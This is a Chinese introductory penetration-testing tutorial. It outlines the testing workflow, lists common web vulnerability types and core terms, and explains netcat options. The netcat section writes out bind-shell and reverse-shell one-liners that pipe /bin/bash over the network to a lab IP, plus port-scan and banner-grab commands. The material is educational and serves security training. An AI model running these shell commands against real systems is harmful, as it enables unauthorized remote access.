进阶篇 1.渗透测试介绍

150 阅读2分钟

渗透测试

渗透测试流程

  • 信息收集
    • a. 基本信息收集: IP、网段、域名、端口
    • b.操作系统
    • d.中间件
    • e.脚本
    • f.数据库
    • g.CMS 源码
    • h.社工信息:联系信息、人员信息、公司信息、域名/服务器注册商
  • 漏洞探测
    • a.借用漏洞库 比如:www.exploit-db.com
    • b.根据不同的漏洞自己挖掘 智榜样a. 弱口命
    • b. REC(远程命令执行漏洞和远程代码执行漏洞)
    • c. SQL 注入
    • d. XSS 跨站脚本攻击
    • e. CSRF(跨站请求伪造)
    • f. SSRF(服务的请求伪造)
    • g. 文件上传、下载
    • h. XXE(XML 外部实体注入)
  • 漏洞利用
    • 手工验证
  • 获取所需信息
    • 绕过防御机制(WAF,防火墙)
    • 定制攻击路径(内网,间接、直接)
    • 绕过检测机制(代码检查)
    • 攻击代码
  • 信息整理和报告撰写

渗透测试核心概念

  • 漏洞 PoC

复现漏洞demo

  • EXP

exploit 漏洞攻击

  • Payload

成功执行的代码

  • Shellcode

cmd 或者 /bin/bash,正向shell和反向shell

  • 社工

其它概念

  • 肉鸡

被控制的计算机

  • 木马

用于控制的后门

  • 病毒

破坏和复制

  • 0day
  • 1day
  • nday

瑞士军刀 (NetCut)使用

  • 参数

image.png

-l :开启监听
-p:指定端口
-t:以 telnet 形式应答
-e:程序重定向
-n:以数字形式标识 IP
-v:显示执行命令过程
-z:不进行交互,直接显示结果
-u:使用 UDP 协议传输
-w:设置超时时间
-d 后台运行
  • 简单交互
#服务端监听
nc -lp 5566   
#客户端
nc <target ip> 5566

image.png

image.png

  • 正向shell

服务端

$ nc -lp 5566 -e /bin/bash

客户端

c: nc 192.168.239.128 5566

  • 反向shell

服务端

$ nc -lvp 5566

客户端

c: nc -e /bin/bash 192.168.239.128 5566

  • 端口扫描

nc -n -v -w1 -z 192.168.239.128 1-1000

  • 打印banner

echo " " | nc -n -v -w1 -z 192.168.239.128 1-1000

练习地址

墨者学院 www.mozhe.cn/